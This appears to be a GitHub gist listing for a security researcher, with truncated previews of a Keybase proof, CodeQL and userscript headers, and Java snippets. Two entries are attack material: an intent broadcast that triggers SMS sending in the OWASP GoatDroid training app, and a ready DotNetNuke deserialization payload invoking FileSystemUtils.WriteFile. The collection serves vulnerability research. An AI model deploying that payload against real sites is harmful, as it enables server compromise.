I hereby claim:
- I am pwntester on github.
- I am pwntester (https://keybase.io/pwntester) on keybase.
- I have a public key whose fingerprint is 4777 762E 3F49 932D 4CAD 5BFE CB38 D5E4 FEA7 40AB
To claim this, I am signing this object:
| Intent broadcastIntent=new Intent(); | |
| broadcastIntent.setAction("org.owasp.goatdroid.fourgoats.SOCIAL_SMS"); | |
| broadcastIntent.putExtra("phoneNumber","0034666666666"); | |
| broadcastIntent.putExtra("message","Hi"); | |
| sendBroadcast(broadcastIntent) |
I hereby claim:
To claim this, I am signing this object:
Based on Chris Frohoff and Wouter Coekaerts ideas:
Full project (containing dependencies) can be found here:
| <profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:/windows/win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile> |
Research:
| /** | |
| * @name SSTI | |
| * @kind path-problem | |
| * @id java/ssti | |
| */ | |
| import java | |
| import semmle.code.java.dataflow.TaintTracking | |
| import semmle.code.java.dataflow.FlowSources | |
| import DataFlow |
| // ==UserScript== | |
| // @name LGTM stars | |
| // @namespace http://tampermonkey.net/ | |
| // @version 0.1 | |
| // @description Show star counts | |
| // @author Alvaro Muñoz (@pwntester) | |
| // @match https://lgtm.com/query/* | |
| // @grant none | |
| // @run-at document-idle | |
| // ==/UserScript== |
| package org.pwntester.jaxrs_jdbc; | |
| import com.fasterxml.jackson.annotation.JsonProperty; | |
| import org.springframework.beans.factory.annotation.Autowired; | |
| import org.springframework.jdbc.core.JdbcTemplate; | |
| import org.springframework.jdbc.core.RowCallbackHandler; | |
| import javax.ws.rs.*; | |
| import javax.ws.rs.core.MediaType; | |
| import java.sql.ResultSet; |
| - type: custom:plotly-graph | |
| defaults: | |
| entity: | |
| extend_to_present: true | |
| period: auto | |
| line: | |
| width: 0 | |
| layout: | |
| hovermode: x unified | |
| entities: |